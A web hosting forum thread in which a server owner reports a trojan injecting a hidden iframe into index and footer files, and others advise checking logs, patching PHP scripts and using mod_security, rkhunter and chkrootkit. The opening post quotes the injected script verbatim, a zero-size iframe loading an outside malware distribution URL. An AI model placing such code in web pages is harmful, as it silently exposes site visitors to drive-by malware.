Injector Trojan Problem‏ and Updates

Hello,

i have a trojan problem on my server. This trojan inject an iframe with js code on my page (all of index.htm,index.html,index.php, bottom.php,footer.php files ) like

<!-- Rambler.Ru --><script language=javascript>status=location;document.write(’<iframe src=“http://xanjan.cn/tds/in.cgi?5” width=0 height=0 frameborder=0 display:none onLoad=“status=defaultStatus;”></iframe>’);</script><!-- Rambler.Ru -->

This is a problem for me.

So now i clean %90-95 of these codes. But i think that there is a problem with my Antivirus ClamAv.

The ClamAV version of my server 0.88.4-2.vm on my page. But when i visit the clamav.com there is a newer stable version of ClamAv with 0.93

When i want to update my system with yum update -y command i faced the "Error accessing config.file: /etc/yum/conf"

So now i can not update my system. And most of the pages that i clean are infected again.

But when i check Virtualmin Package Updates from the Webmin, there is no new package founds on the check result. Also there is no new update packages for any program.

Can you help me to solve this problem. This is serious for me. Because some of our sites hacked with this codes ans trojan.

This is wholly unrelated to clamav. ClamAV is used on a Virtualmin system for scanning email, and nothing else–it would not catch the problem you’ve described. (Though, I’ve been rolling out the 0.93 version for all platforms over the past week or so…it’ll reach our platform soon, though you haven’t told us what platform that is.)

You have one or more php scripts on your system that have one or more security vulnerabilities. You need to make sure you are running the latest versions of all of your PHP scripts–most PHP apps in the wild have pretty horrible security records (there are a few exceptions with stellar records, of course, but most are pretty dodgy), so you must keep them up to date, or you will run into problems like you describe. And, of course, cleaning it up is a temporary solution–you need to fix the root cause of the problem, which is probably an insecure PHP script installed on your system.

Again, clamav has nothing to do with finding and preventing this kind of problem. This is not a "virus" in the traditional sense, and would not be detected by clamav, even if you did choose to scan your system with clamav periodically. The vast majority (like 99.99%) or viruses in the wild are Windows-only viruses, and so it would make no sense to scan a Linux box with clamav–it is only for detecting viruses in emails as they arrive on the server.

Thank you for your interest.

How can i learn that when index.php file changed and from which ip? How can i reach these logs.

And which program do you advice to see these logs easily?

And yum is not run on the server now. Because of "Error accessing config.file: /etc/yum/conf". What must i do to solve this update problem.

Thanks.

Best place to check is in the access log - you can find logs here useually:

/home/somesite/etc/logs/access_log (or error_log)

The "somesite" is the site that has the maliciously modified index.php allowing the trojan.

You can check the timestamp of the last time the index.php file was edited (but not by you of course) and then compare that timestamp to error_log and access_log entries.

Sometimes logfiles are here /var/log/httpd/error_log (access_log) but it depends on the OS and how you have webmin/virtualmin configured.

Definitely look for a "common" php based program that you are using that is consistently having the index.php files modified. You may want to shut down the sites altogether.

I recommend looking into “mod_security” - it’ll take some time and reading, but it is worth it. (gotroot.com) Also - rkhunter and chkrootkit are great tools and often there are simple instructions on how to use them and if you are not using them already are definitely worth your time.

There are many articles out there on "hardening apache" googling that would turn up more than a few "how to" links.

Hope that helps and good luck!